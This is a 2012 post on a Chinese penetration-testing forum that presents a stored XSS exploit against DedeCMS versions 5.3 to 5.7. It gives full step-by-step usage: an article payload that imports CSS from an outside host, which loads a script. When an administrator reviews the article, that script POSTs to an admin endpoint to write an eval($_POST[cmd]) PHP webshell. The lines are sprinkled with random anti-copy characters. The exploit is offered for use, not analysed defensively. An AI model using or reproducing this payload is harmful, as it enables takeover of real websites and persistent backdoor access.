找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1615|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell. v& F5 K: `) u! e
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)6 U' O# [, B  i. x, O5 U
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。4 m! u. N3 k" K
下面说说利用方法。
; d# A% D! ^8 [3 U1 T条件有2个:' Y+ z; y/ ~  m+ V9 f
1.开启注册
4 `* R2 P) G0 u8 F2.开启投稿
* e1 `2 g9 ^5 ~+ b注册会员----发表文章
2 O' _' U+ G5 }+ b内容填写:
3 i* M2 G& a; ^0 j, E! a$ }复制代码0 I% m; F5 ?6 k9 k, C6 a
<style>@im\port'\http://xxx.com/xss.css';</style>
  s* y1 u. e/ M+ l新建XSS.Css
7 w. b" `! `% T8 A7 w( l9 p3 m- o; k复制代码- E& \0 B1 q8 k5 u: ?: J
.body{
# Y' a1 h( i- {' `. T" tbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }6 T( m1 c7 s5 s4 W
新建xss.js 内容为
0 O, X- i1 B% r  H. f& E' W复制代码
: Q0 _& a* `8 J1 e' J1.var request = false;* G5 X8 R9 K4 ?; Z4 v
2.if(window.XMLHttpRequest) {, Q6 K9 e# V+ g, p- M& T# S( M( c
3.request = new XMLHttpRequest();' C4 b# X, Z( O% e2 ~9 U
4.if(request.overrideMimeType) {2 w( M! W# d+ J4 [" J
5.request.overrideMimeType('text/xml');% R) \' T( \$ E' i) A5 [
6.}* ^4 u, |! C, V* r% j' V
7.} else if(window.ActiveXObject) {8 [) Y2 i7 l3 G
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
0 s  F1 Y( K& X& a" @/ G9.for(var i=0; i<versions.length; i++) {% C* d- }4 b! r; J* J2 v1 L
10.try {
& {; N" B# [8 u# [+ S, v/ \, I1 y11.request = new ActiveXObject(versions);3 J9 b4 r# g& S; E& z, }7 w
12.} catch(e) {}6 O$ F) ~, D3 z; [+ S  f
13.}
* p1 e7 M( N% n14.}
# w, f3 Q. l3 E! c4 T15.xmlhttp=request;
1 m/ m' u5 N. Y- U0 ]16.function getFolder( url ){
  ^( F- v& e( {! s1 m* H17. obj = url.split('/')
$ r: z2 z5 T7 K+ c18. return obj[obj.length-2]
6 s1 j% @4 t4 z19.}3 O& t8 E6 V* Y4 J# Z
20.oUrl = top.location.href;$ _" Y3 q. i# s  F% a* x
21.u = getFolder(oUrl);& ^" T1 G, }- ^1 ^9 Q2 f
22.add_admin();
3 @/ z6 I+ p1 r5 ]$ y( r2 \* d23.function add_admin(){
0 H  j4 ]9 a+ \. G24.var url= "/"+u+"/sys_sql_query.php";# N% x3 F  {% O, S6 D8 T
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
, Z% Y2 t* P6 f) `2 a$ a26.xmlhttp.open("POST", url, true);
& g, M9 s4 [' q5 `3 w2 e5 v27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
7 c: Y* E& o4 U28.xmlhttp.setRequestHeader("Content-length", params.length);
6 I' C7 S7 u6 K( ?7 H6 H9 l, E0 K29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
6 z) W. v, U- |8 P30.xmlhttp.send(params);
5 h& d# {/ O/ ^& E3 }31.}
0 }7 H2 i1 c( D5 y当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表